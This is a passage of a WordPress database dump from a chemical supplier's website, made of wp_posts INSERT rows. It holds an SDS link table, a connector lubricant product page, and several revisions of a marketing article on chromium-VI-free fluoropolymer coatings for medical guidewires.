href="https://www.miller-stephenson.com/wp-content/uploads/sds/W.pdf">CURING AGENT W</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/532N-16.pdf">MS-532N</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/K54.pdf">ANCAMINE K54</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2017/01/538N-17.pdf">MS-538N</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/K61B.pdf">ANCAMINE K61B</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/539N-16.pdf">MS-539N</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/BDMA.pdf">BDMA</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/550N-16.pdf">MS-550N</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/BF3400.PDF">BF3-400</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/552N-16.pdf">MS-552N</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/DEAPA.pdf">DEAPA</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/580N-16.pdf">MS-580N</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/NMA.pdf">NMA</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/582N-16.pdf">MS-582N</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/V115.pdf">VERSAMID 115</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/12/747-16.pdf">MS-747</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/V125.pdf">VERSAMID 125</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/V140.pdf">VERSAMID 140</a></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'SDS', '', 'inherit', 'closed', 'closed', '', '1842-revision-v1', '', '', '2017-02-13 20:54:59', '2017-02-13 20:54:59', '', 1842, 'https://www.miller-stephenson.com/1842-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3600, 0, '2017-02-13 21:03:50', '2017-02-13 21:03:50', '', '', '', 'publish', 'closed', 'closed', '', '3600', '', '', '2017-02-13 21:03:50', '2017-02-13 21:03:50', '', 0, 'https://www.miller-stephenson.com/nf_sub/3600/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3601, 0, '2017-02-14 13:23:25', '2017-02-14 13:23:25', '', '', '', 'publish', 'closed', 'closed', '', '3601', '', '', '2017-02-14 13:23:25', '2017-02-14 13:23:25', '', 0, 'https://www.miller-stephenson.com/nf_sub/3601/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3602, 0, '2017-02-14 16:09:31', '2017-02-14 16:09:31', '', '', '', 'publish', 'closed', 'closed', '', '3602', '', '', '2017-02-14 16:09:31', '2017-02-14 16:09:31', '', 0, 'https://www.miller-stephenson.com/nf_sub/3602/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3603, 0, '2017-02-14 17:38:08', '2017-02-14 17:38:08', '', '', '', 'publish', 'closed', 'closed', '', '3603', '', '', '2017-02-14 17:38:08', '2017-02-14 17:38:08', '', 0, 'https://www.miller-stephenson.com/nf_sub/3603/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3606, 2, '2017-02-14 20:20:52', '2017-02-14 20:20:52', '<h3>MS-383H Connector Lubricant</h3>\r\nBy combining the superior lubricating qualities of Polyphenyl Ether with the cleaning power of a hydrofluoroether azeotrope, Miller-Stephenson has created Connector Lubricant, MS-383H, a formulation that provides the most advanced total treatment for connectors.\r\n\r\nADVANTAGES:\r\n<ul>\r\n 	<li>Cleans, lubricates and protects multi-pin connectors</li>\r\n 	<li>Reduces insertion forces  Greatly increases mating cycles (especially important where high pin counts are involved)</li>\r\n 	<li>Extends connector life by preventing corrosion and galling</li>\r\n 	<li>Removes contaminates and oxides.</li>\r\n 	<li>Is non-migrating-contains no silicones.</li>\r\n 	<li>Non ozone depleting</li>\r\n 	<li>Available with an UV (ultraviolet) indicator</li>\r\n 	<li>No interference in electrical continuity</li>\r\n 	<li>Nonflammable</li>\r\n 	<li>NSN 6850-01-519-8521 (MS-381H)</li>\r\n 	<li>NSN-6850-01-538-3496 (MS-383H)</li>\r\n 	<li>RoHS Compliant</li>\r\n</ul>\r\nVOC content of MS-381H....................................524gms/l\r\n\r\nVOC content of MS-381HC.................................522gms/l\r\n\r\nVOC content of MS-383H....................................699gms/l\r\n\r\nThe active ingredient of Connector Lubricant is a six (6) ring polyphenyl ether lubricant. This lubricant will help protect metal connector surfaces from excessive wear, when subjected to hundreds of mating cycles, thereby increasing the life of the connectors. It will also reduce insertion forces and provide corrosion protection in harsh environments.\r\n\r\nPolyphenyl ethers (PPE) are very viscous fluids and only a very thin film is required. Connector Lubricant is available in 1% and 2% PPE concentrations for different applications. 1% (MS- 381H Series) and 2% (MS-381HC/383H Series) are at the proper concentration for connectors operating at room temperatures where there is little or no vibration. Higher concentrations are available in Bulk formulations.\r\n\r\nA Spectro EN-140 4-watt Long Wave UV Lamp may be used for UV detection.', 'MS-383H', 'By combining the superior lubricating qualities of Polyphenyl Ether with the cleaning power of a hydrofluoroether azeotrope, Miller-Stephenson has created Connector Lubricant, a formulation that provides the most advanced total treatment for connectors.', 'publish', 'closed', 'closed', '', 'ms-383h', '', '', '2017-02-14 20:22:01', '2017-02-14 20:22:01', '', 0, 'https://www.miller-stephenson.com/?post_type=product&#038;p=3606', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (3607, 2, '2017-02-14 20:19:04', '2017-02-14 20:19:04', '', 'MS-383H', '', 'inherit', 'closed', 'closed', '', 'shutterstock_142198558', '', '', '2017-02-14 20:19:20', '2017-02-14 20:19:20', '', 3606, 'https://www.miller-stephenson.com/wp-content/uploads/2017/02/shutterstock_142198558.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (3608, 0, '2017-02-15 01:15:54', '2017-02-15 01:15:54', '', '', '', 'publish', 'closed', 'closed', '', '3608', '', '', '2017-02-15 01:15:54', '2017-02-15 01:15:54', '', 0, 'https://www.miller-stephenson.com/nf_sub/3608/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3610, 3, '2017-02-16 19:01:54', '2017-02-16 19:01:54', '<h3><span style="font-size: 115%;"><strong>Medical Guidewire Coatings: </strong></span><span style="font-size: 115%;"><strong>Miller-Stephenson\'s fluoropolymer coatings </strong></span><span style="font-size: 115%;"><strong>leverage unmatched adhesion and superior lubricity to meet the demanding requirements of medical devices.</strong></span></h3>\r\nIn the medical guidewire coatings market, the use of fluoropolymers centers on three key properties: lubricity, biocompatibility and surface adhesion. Failing to deliver on any of these characteristics can have massive performance and liability implications.  Therefore it is critical that device coaters and manufacturers understand that choosing the highest performing and most consistent fluoropolymer coatings is critical criteria to consider. Fluoropolymer resins find utility in a variety of medical applications from endoscopic blades, surgical instruments, cannulae, guidewires, electrosurgical tools, hypotubes, etc. The use of fluoropolymers in medical applications is so extensive that a detailed exploration of the market is beyond the scope of this article. This expansive application portfolio is directly correlated to the unique stability, lubricity and biocompatible nature found exclusively with fluoropolymer technology.\r\n\r\n&nbsp;\r\n\r\n[caption id="attachment_3615" align="alignleft" width="248"]<img class="wp-image-3615" src="https://www.miller-stephenson.com/wp-content/uploads/2017/02/shutterstock_349523072-800x534.jpg" alt="shutterstock_349523072" width="248" height="165" /> G<span style="font-size: 105%;">uide wire traversing a blood vessel</span>[/caption]\r\n\r\nThe focus of this article will lie primarily on the coating of metallic medical wire (ie: catheter guidewire, nitinol wire) and cautery / scalpel tips. Fluoropolymer coated guidewires are often used in the first step of many minimally invasive medical procedures. Fluoropolymer coatings for guidewires are applied for three primary reasons: Enable smooth wire insertion, lower friction during wire advancement / minimize friction-induced vessel spasms, and protection of the core wire from corrosion. Each of these characteristics are critical for successful completion of any medical procedure using guide wire.  From a chemical standpoint these attributes start with the base fluoropolymer and binder system.  Industry precedent relied upon chromium (VI)-based binder systems to provide the surface adhesion of the fluoropolymer to the metallic substrate.  These systems typically would consist of a water or solvent carrier fluid and could be applied via spray, dip, or reel-to-reel operations. Coatings consist of a traditional two-coat system (primer and topcoat) and an efficient, high-throughput one-coat system. Coating thickness is typically 5-10 micron. Strict ISO and ASTM qualifications exist to evaluate the adhesion, flexibility and corrosion-resistance of the applied coatings. Unfortunately, Cr(VI) exhibits acute cytotoxicty at low exposure levels and therefore considerable safety precautions must be taken throughout the shipment, storage, application, curing procedures. Once the coating is fully cured, all safety concerns associated with Cr(VI) no longer apply and the coated wire or medical device is 100% biocompatible and safe for use. Our acid-primer based medical guidewire coatings are widely known as the "gold standard" in terms of durability, adhesion, and surface lubricity, indicative of our astute attention to perfection. Our medical coatings have never been observed showing any sign of delamination nor in-vivo "slip-stick" issues.\r\n\r\nChemours, in conjunction with Miller-Stephenson, have developed state-of-the-art, next generation medical guidewire coatings which are chromium-VI free, yet exhibit comparable performance to the acid-primer systems. Removal of Cr(VI) eliminates the need for expensive shipping, storage, and applicator exposure precautions.  These novel coatings are available in solvent and water-based carrier fluids and are formulated for two-coat or one-coat applications.  Traditional coating methodology such as spray, dip, and reel-to-reel are fully compatible with this next generation coating. Moreover because of the advancements made in this technology, Chemours has developed a coating specifically for Nitinol and temperature-sensitive alloys, providing a low-temperature curing profile while maintaining full adhesion and lubricity characteristics. Benefits of this non-Cr(IV) include the following:\r\n<ul>\r\n 	<li>Non-acid Primer (Chromium-VI) system</li>\r\n 	<li>Water and Solvent-based formulations</li>\r\n 	<li>One-Coat and Two-Coat Systems</li>\r\n 	<li>High and Low Cure temperatures</li>\r\n 	<li>Various Colors and Viscosities available</li>\r\n 	<li>Extremely low coefficient of friction (Tested ASTM 1894)</li>\r\n 	<li>Pass of ASTM D3359- Adhesion Test</li>\r\n 	<li>Passes  ISO 11070- Corrosion Resistance Test</li>\r\n 	<li>Passes ISO 7802- Wire Wrapping Test</li>\r\n</ul>\r\nCustomer evaluations of this new technology from both coaters and end users have been succinct; this next generation coating brings all the performance benefits of our previous acid-primer formulations while alleviating the strict regulatory and toxicity hurdles observed with Cr(VI). With over 40 years of innovation and development in medical coatings, Chemours and Miller-Stephenson have the technical prowess and operational capacity to deliver the highest of quality products and customer service to its medical customers.\r\n\r\nhttps://www.youtube.com/watch?v=-YyTjhmKcyw\r\n<h3>Technical or Application Support:</h3>\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/product/fluoropolymer-medical-coatings/"><span style="text-decoration: underline;"><strong>For any further questions about our Fluoropolymer Medical Coatings visit our Medical Webpage</strong></span></a></li>\r\n 	<li><span style="text-decoration: underline;"><strong><a href="https://www.miller-stephenson.com/tech-support/">If you require any further technical or application support please contact our technical staff</a></strong></span></li>\r\n</ul>', 'Medical Guidewire Coatings: Innovative Fluoropolymer Solutions', '', 'publish', 'closed', 'closed', '', 'medical-guidewire-coatings', '', '', '2017-05-17 18:53:25', '2017-05-17 18:53:25', '', 0, 'https://www.miller-stephenson.com/?p=3610', 0, 'post', '', 0); 
INSERT INTO `wp_posts` VALUES (3611, 3, '2017-02-15 15:35:39', '2017-02-15 15:35:39', '<h1><strong>Medical device manufacturers can leverage the thin-film,\r\nlubricity, and biocompatibility of Chemours/Miller-Stephensons\' fluoropolymers to meet the demanding requirements of their devices.</strong></h1>\r\n&nbsp;\r\n\r\nIn the medical device market, the use of fluoropolymers centers on three key properties: lubricity, biocompatibility and surface adhesion. Failing to deliver on any of these characteristics can have massive performance and liability implications.  Therefore it is critical that device coaters and manufactures understand that choosing the highest performing and most consistent fluoropolymer coatings is critical criteria to consider. Fluoropolymer resins find utility in a variety of medicals application from endoscopic blades, surgical instruments, cannulae, guide wires, electrosurgical tools, hypotubes, etc. The use of fluoropolymers in medical applications is so extensive that a detailed exploration of the market is beyond the scope of this article. This expansive application portfolio is directly correlated to the unique stability, lubricity, and biocompatible nature found exclusive with fluoropolymer technology.\r\n\r\nThe focus of this article will lie primarily on the coating of metallic medical wire (ie: catheter guidewire, nitinol wire) and cautery / scalpel tips. Fluoropolymer coatings for guidewires are applied for three primary reasons: Enable smooth wire insertion, lower friction during wire advancement / minimize friction-induced vessel spasms, and protection the core wire from corrosion. Each of these characteristics are critical for successful completion of any medical procedure using guide wire.  From a chemical standpoint these attributes start with the fluoropolymer and binder system chosen.  Industry precedent relied upon chromium (VI)-based binder systems to provide the surface adhesion of the fluoropolymer to the metallic substrate.  These systems typically would consist of a water or solvent carrier fluid and could be applied via spray, dip, or reel-to-reel operations.  Strict ISO and ASTM qualifications exist to evaluate the adhesion, flexibility and corrosion-resistance of the applied coatings.\r\n\r\n&nbsp;', 'Medical Coatings: Innovative Fluoropolymer Solutions', '', 'inherit', 'closed', 'closed', '', '3610-revision-v1', '', '', '2017-02-15 15:35:39', '2017-02-15 15:35:39', '', 3610, 'https://www.miller-stephenson.com/3610-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3612, 3, '2017-02-15 16:36:42', '2017-02-15 16:36:42', '', 'medical guidewire coatings', '', 'inherit', 'closed', 'closed', '', 'shutterstock_300125900', '', '', '2017-02-16 18:48:34', '2017-02-16 18:48:34', '', 3610, 'https://www.miller-stephenson.com/wp-content/uploads/2017/02/shutterstock_300125900.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (3613, 3, '2017-02-15 16:39:14', '2017-02-15 16:39:14', '<h1><strong>Medical device manufacturers can leverage the thin-film,\r\nlubricity, and biocompatibility of Chemours/Miller-Stephensons\' fluoropolymers to meet the demanding requirements of their devices.</strong></h1>\r\n&nbsp;\r\n\r\nIn the medical device market, the use of fluoropolymers centers on three key properties: lubricity, biocompatibility and surface adhesion. Failing to deliver on any of these characteristics can have massive performance and liability implications.  Therefore it is critical that device coaters and manufactures understand that choosing the highest performing and most consistent fluoropolymer coatings is critical criteria to consider. Fluoropolymer resins find utility in a variety of medicals application from endoscopic blades, surgical instruments, cannulae, guide wires, electrosurgical tools, hypotubes, etc. The use of fluoropolymers in medical applications is so extensive that a detailed exploration of the market is beyond the scope of this article. This expansive application portfolio is directly correlated to the unique stability, lubricity, and biocompatible nature found exclusive with fluoropolymer technology.\r\n\r\nThe focus of this article will lie primarily on the coating of metallic medical wire (ie: catheter guidewire, nitinol wire) and cautery / scalpel tips. Fluoropolymer coatings for guidewires are applied for three primary reasons: Enable smooth wire insertion, lower friction during wire advancement / minimize friction-induced vessel spasms, and protection the core wire from corrosion. Each of these characteristics are critical for successful completion of any medical procedure using guide wire.  From a chemical standpoint these attributes start with the base fluoropolymer and binder system chosen.  Industry precedent relied upon chromium (VI)-based binder systems to provide the surface adhesion of the fluoropolymer to the metallic substrate.  These systems typically would consist of a water or solvent carrier fluid and could be applied via spray, dip, or reel-to-reel operations. Coatings consist of a traditional two-coat system (primer and topcoat) and an efficient, high-throughput one-coat system.  Strict ISO and ASTM qualifications exist to evaluate the adhesion, flexibility and corrosion-resistance of the applied coatings. Unfortunately Cr(VI) exhibits acute cytotoxicty at low exposure levels and therefore considerable safety precautions must be taken throughout the shipment, storage, application, curing procedures. Once the coating is fully cured all safety concerns associated with Cr(VI) no longer apply and the coated wire or medical device is 100% biocompatible and safe for use.\r\n\r\nChemours, in conjunction with Miller-Stephenson, has developed a state-of-the-art, next generation fluoropolymer coating which is chromium-VI free, yet has comparable performance to the acid-primer systems. Removal of Cr(VI) eliminates the need for expensive shipping, storage, and applicator exposure precautions. These novel coatings are available in solvent and water-based carrier fluids and are formulated for two-coat or one-coat applications.  Traditional coating methodology such as spray, dip, and reel-to-reel are fully compatible with this next generation coating. Moreover because of the advancements made in this technology, Chemours has developed a coating specifically for Nitinol and temperature-sensitive alloys, providing a low-temperature curing profile while maintaining full adhesion and lubricity characteristics. Benefits of this non-Cr(IV) include the following:\r\n<ul>\r\n 	<li>Non-acid Primer system</li>\r\n 	<li>Water and Solvent-based formulations</li>\r\n 	<li>One-Coat and Two-Coat Systems</li>\r\n 	<li>High and Low Cure temperatures</li>\r\n 	<li>Various Colors and Viscosities available</li>\r\n 	<li>Low coefficient of friction (&lt;0.2)</li>\r\n 	<li>Pass of ASTM D3359- Adhesion Test</li>\r\n 	<li>Pass of ASTM 1894- Static and Kinetic Coefficient of Friction Test</li>\r\n 	<li>Pass of ISO 11070- Corrosion Resistance Test</li>\r\n 	<li>Pass of ISO 7802- Wire Wrapping Test</li>\r\n</ul>\r\nCustomer evaluations of this new technology from both coaters and end users have been succinct, this next generation coating brings all the performance benefits of our previous acid-primer formulations while alleviating the strict regulatory and toxicity hurdles behind.', 'Medical Coatings: Innovative Fluoropolymer Solutions', '', 'inherit', 'closed', 'closed', '', '3610-revision-v1', '', '', '2017-02-15 16:39:14', '2017-02-15 16:39:14', '', 3610, 'https://www.miller-stephenson.com/3610-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3614, 3, '2017-02-15 16:43:57', '2017-02-15 16:43:57', '', 'shutterstock_441571792', '', 'inherit', 'closed', 'closed', '', 'shutterstock_441571792', '', '', '2017-02-15 16:43:57', '2017-02-15 16:43:57', '', 3610, 'https://www.miller-stephenson.com/wp-content/uploads/2017/02/shutterstock_441571792.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (3615, 3, '2017-02-15 16:45:59', '2017-02-15 16:45:59', '', 'shutterstock_349523072', '', 'inherit', 'closed', 'closed', '', 'shutterstock_349523072', '', '', '2017-02-15 16:45:59', '2017-02-15 16:45:59', '', 3610, 'https://www.miller-stephenson.com/wp-content/uploads/2017/02/shutterstock_349523072.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (3616, 3, '2017-02-15 16:47:59', '2017-02-15 16:47:59', '<h1><strong>Medical device manufacturers can leverage the thin-film,\r\nlubricity, and biocompatibility of Chemours/Miller-Stephensons\' fluoropolymers to meet the demanding requirements of their devices.</strong></h1>\r\n&nbsp;\r\n\r\nIn the medical device market, the use of fluoropolymers centers on three key properties: lubricity, biocompatibility and surface adhesion. Failing to deliver on any of these characteristics can have massive performance and liability implications.  Therefore it is critical that device coaters and manufactures understand that choosing the highest performing and most consistent fluoropolymer coatings is critical criteria to consider. Fluoropolymer resins find utility in a variety of medicals application from endoscopic blades, surgical instruments, cannulae, guide wires, electrosurgical tools, hypotubes, etc. The use of fluoropolymers in medical applications is so extensive that a detailed exploration of the market is beyond the scope of this article. This expansive application portfolio is directly correlated to the unique stability, lubricity, and biocompatible nature found exclusive with fluoropolymer technology.\r\n\r\n[caption id="attachment_3615" align="alignleft" width="326"]<img class="wp-image-3615" src="https://www.miller-stephenson.com/wp-content/uploads/2017/02/shutterstock_349523072-800x534.jpg" alt="shutterstock_349523072" width="326" height="217" /> G<span style="font-size: 105%;">uide wire traversing a blood vessel</span>[/caption]\r\n\r\nThe focus of this article will lie primarily on the coating of metallic medical wire (ie: catheter guidewire, nitinol wire) and cautery / scalpel tips. Fluoropolymer coatings for guidewires are applied for three primary reasons: Enable smooth wire insertion, lower friction during wire advancement / minimize friction-induced vessel spasms, and protection the core wire from corrosion. Each of these characteristics are critical for successful completion of any medical procedure using guide wire.  From a chemical standpoint these attributes start with the base fluoropolymer and binder system chosen.  Industry precedent relied upon chromium (VI)-based binder systems to provide the surface adhesion of the fluoropolymer to the metallic substrate.  These systems typically would consist of a water or solvent carrier fluid and could be applied via spray, dip, or reel-to-reel operations. Coatings consist of a traditional two-coat system (primer and topcoat) and an efficient, high-throughput one-coat system.  Strict ISO and ASTM qualifications exist to evaluate the adhesion, flexibility and corrosion-resistance of the applied coatings. Unfortunately Cr(VI) exhibits acute cytotoxicty at low exposure levels and therefore considerable safety precautions must be taken throughout the shipment, storage, application, curing procedures. Once the coating is fully cured all safety concerns associated with Cr(VI) no longer apply and the coated wire or medical device is 100% biocompatible and safe for use.\r\n\r\nChemours, in conjunction with Miller-Stephenson, has developed a state-of-the-art, next generation fluoropolymer coating which is chromium-VI free, yet has comparable performance to the acid-primer systems. Removal of Cr(VI) eliminates the need for expensive shipping, storage, and applicator exposure precautions. These novel coatings are available in solvent and water-based carrier fluids and are formulated for two-coat or one-coat applications.  Traditional coating methodology such as spray, dip, and reel-to-reel are fully compatible with this next generation coating. Moreover because of the advancements made in this technology, Chemours has developed a coating specifically for Nitinol and temperature-sensitive alloys, providing a low-temperature curing profile while maintaining full adhesion and lubricity characteristics. Benefits of this non-Cr(IV) include the following:\r\n<ul>\r\n 	<li>Non-acid Primer system</li>\r\n 	<li>Water and Solvent-based formulations</li>\r\n 	<li>One-Coat and Two-Coat Systems</li>\r\n 	<li>High and Low Cure temperatures</li>\r\n 	<li>Various Colors and Viscosities available</li>\r\n 	<li>Low coefficient of friction (&lt;0.2)</li>\r\n 	<li>Pass of ASTM D3359- Adhesion Test</li>\r\n 	<li>Pass of ASTM 1894- Static and Kinetic Coefficient of Friction Test</li>\r\n 	<li>Pass of ISO 11070- Corrosion Resistance Test</li>\r\n 	<li>Pass of ISO 7802- Wire Wrapping Test</li>\r\n</ul>\r\nCustomer evaluations of this new technology from both coaters and end users have been succinct, this next generation coating brings all the performance benefits of our previous acid-primer formulations while alleviating the strict regulatory and toxicity hurdles behind.', 'Medical Coatings: Innovative Fluoropolymer Solutions', '', 'inherit', 'closed', 'closed', '', '3610-revision-v1', '', '', '2017-02-15 16:47:59', '2017-02-15 16:47:59', '', 3610, 'https://www.miller-stephenson.com/3610-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3617, 3, '2017-02-15 16:48:40', '2017-02-15 16:48:40', '<h1><strong>Medical device manufacturers can leverage the thin-film,\r\nlubricity, and biocompatibility of Chemours/Miller-Stephensons\' fluoropolymers to meet the demanding requirements of their devices.</strong></h1>\r\n&nbsp;\r\n\r\nIn the medical device market, the use of fluoropolymers centers on three key properties: lubricity, biocompatibility and surface adhesion. Failing to deliver on any of these characteristics can have massive performance and liability implications.  Therefore it is critical that device coaters and manufactures understand that choosing the highest performing and most consistent fluoropolymer coatings is critical criteria to consider. Fluoropolymer resins find utility in a variety of medicals application from endoscopic blades, surgical instruments, cannulae, guide wires, electrosurgical tools, hypotubes, etc. The use of fluoropolymers in medical applications is so extensive that a detailed exploration of the market is beyond the scope of this article. This expansive application portfolio is directly correlated to the unique stability, lubricity, and biocompatible nature found exclusive with fluoropolymer technology.\r\n\r\nThe focus of this article will lie primarily on the coating of metallic medical wire (ie: catheter guidewire, nitinol wire) and cautery / scalpel tips. Fluoropolymer coatings for guidewires are applied for three primary reasons: Enable smooth wire insertion, lower friction during wire advancement / minimize friction-induced vessel spasms, and protection the core wire from corrosion. Each of these characteristics are critical for successful completion of any medical procedure using guide wire.  From a chemical standpoint these attributes start with the base fluoropolymer and binder system chosen.  Industry precedent relied upon chromium (VI)-based binder systems to provide the surface adhesion of the fluoropolymer to the metallic substrate.  These systems typically would consist of a water or solvent carrier fluid and could be applied via spray, dip, or reel-to-reel operations. Coatings consist of a traditional two-coat system (primer and topcoat) and an efficient, high-throughput one-coat system.  Strict ISO and ASTM qualifications exist to evaluate the adhesion, flexibility and corrosion-resistance of the applied coatings. Unfortunately Cr(VI) exhibits acute cytotoxicty at low exposure levels and therefore considerable safety precautions must be taken throughout the shipment, storage, application, curing procedures. Once the coating is fully cured all safety concerns associated with Cr(VI) no longer apply and the coated wire or medical device is 100% biocompatible and safe for use.\r\n\r\nChemours, in conjunction with\r\n\r\n[caption id="attachment_3615" align="alignleft" width="326"]<img class="wp-image-3615" src="https://www.miller-stephenson.com/wp-content/uploads/2017/02/shutterstock_349523072-800x534.jpg" alt="shutterstock_349523072" width="326" height="217" /> G<span style="font-size: 105%;">uide wire traversing a blood vessel</span>[/caption]\r\n\r\nMiller-Stephenson, has developed a state-of-the-art, next generation fluoropolymer coating which is chromium-VI free, yet has comparable performance to the acid-primer systems. Removal of Cr(VI) eliminates the need for expensive shipping, storage, and applicator exposure precautions. These novel coatings are available in solvent and water-based carrier fluids and are formulated for two-coat or one-coat applications.  Traditional coating methodology such as spray, dip, and reel-to-reel are fully compatible with this next generation coating. Moreover because of the advancements made in this technology, Chemours has developed a coating specifically for Nitinol and temperature-sensitive alloys, providing a low-temperature curing profile while maintaining full adhesion and lubricity characteristics. Benefits of this non-Cr(IV) include the following:\r\n<ul>\r\n 	<li>Non-acid Primer system</li>\r\n 	<li>Water and Solvent-based formulations</li>\r\n 	<li>One-Coat and Two-Coat Systems</li>\r\n 	<li>High and Low Cure temperatures</li>\r\n 	<li>Various Colors and Viscosities available</li>\r\n 	<li>Low coefficient of friction (&lt;0.2)</li>\r\n 	<li>Pass of ASTM D3359- Adhesion Test</li>\r\n 	<li>Pass of ASTM 1894- Static and Kinetic Coefficient of Friction Test</li>\r\n 	<li>Pass of ISO 11070- Corrosion Resistance Test</li>\r\n 	<li>Pass of ISO 7802- Wire Wrapping Test</li>\r\n</ul>\r\nCustomer evaluations of this new technology from both coaters and end users have been succinct, this next generation coating brings all the performance benefits of our previous acid-primer formulations while alleviating the strict regulatory and toxicity hurdles behind.', 'Medical Coatings: Innovative Fluoropolymer Solutions', '', 'inherit', 'closed', 'closed', '', '3610-revision-v1', '', '', '2017-02-15 16:48:40', '2017-02-15 16:48:40', '', 3610, 'https://www.miller-stephenson.com/3610-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3618, 3, '2017-02-15 16:50:25', '2017-02-15 16:50:25', '<h1><strong>Medical device manufacturers can leverage the thin-film,\r\nlubricity, and biocompatibility of Chemours/Miller-Stephensons\' fluoropolymers to meet the demanding requirements of their devices.</strong></h1>\r\n&nbsp;\r\n\r\nIn the medical device market, the use of fluoropolymers centers on three key properties: lubricity, biocompatibility and surface adhesion. Failing to deliver on any of these characteristics can have massive performance and liability implications.  Therefore it is critical that device coaters and manufactures understand that choosing the highest performing and most consistent fluoropolymer coatings is critical criteria to consider. Fluoropolymer resins find utility in a variety of medicals application from endoscopic blades, surgical instruments, cannulae, guide wires, electrosurgical tools, hypotubes, etc. The use of fluoropolymers in medical applications is so extensive that a detailed exploration of the market is beyond the scope of this article. This expansive application portfolio is directly correlated to the unique stability, lubricity, and biocompatible nature found exclusive with fluoropolymer technology.\r\n\r\nThe focus of this article will lie primarily on the coating of metallic medical wire (ie: catheter guidewire, nitinol wire) and cautery / scalpel tips. Fluoropolymer coatings for guidewires are applied for three primary reasons: Enable smooth wire insertion, lower friction during wire advancement / minimize friction-induced vessel spasms, and protection the core wire from corrosion. Each of these characteristics are critical for successful completion of any medical procedure using guide wire.  From a chemical standpoint these attributes start with the base fluoropolymer and binder system chosen.  Industry precedent relied upon chromium (VI)-based binder systems to provide the surface adhesion of the fluoropolymer to the metallic substrate.  These systems typically would consist of a water or solvent carrier fluid and could be applied via spray, dip, or reel-to-reel operations. Coatings consist of a traditional two-coat system (primer and topcoat) and an efficient, high-throughput one-coat system.  Strict ISO and ASTM qualifications exist to evaluate the adhesion, flexibility and corrosion-resistance of the applied coatings. Unfortunately Cr(VI) exhibits acute cytotoxicty at low exposure levels and therefore considerable safety precautions must be taken throughout the shipment, storage, application, curing procedures. Once the coating is fully cured all safety concerns associated with Cr(VI) no longer apply and the coated wire or medical device is 100% biocompatible and safe for use.\r\n\r\n&nbsp;\r\n\r\nChemours, in conjunction with Miller-Stephenson, has developed a state-of-the-art, next generation fluoropolymer coating which is chromium-VI free, yet has comparable performance to the acid-primer systems. Removal of Cr(VI) eliminates the need for expensive shipping, storage, and applicator exposure precautions.\r\n\r\n[caption id="attachment_3615" align="alignleft" width="286"]<img class="wp-image-3615" src="https://www.miller-stephenson.com/wp-content/uploads/2017/02/shutterstock_349523072-800x534.jpg" alt="shutterstock_349523072" width="286" height="191" /> G<span style="font-size: 105%;">uide wire traversing a blood vessel</span>[/caption]\r\n\r\nThese novel coatings are available in solvent and water-based carrier fluids and are formulated for two-coat or one-coat applications.  Traditional coating methodology such as spray, dip, and reel-to-reel are fully compatible with this next generation coating. Moreover because of the advancements made in this technology, 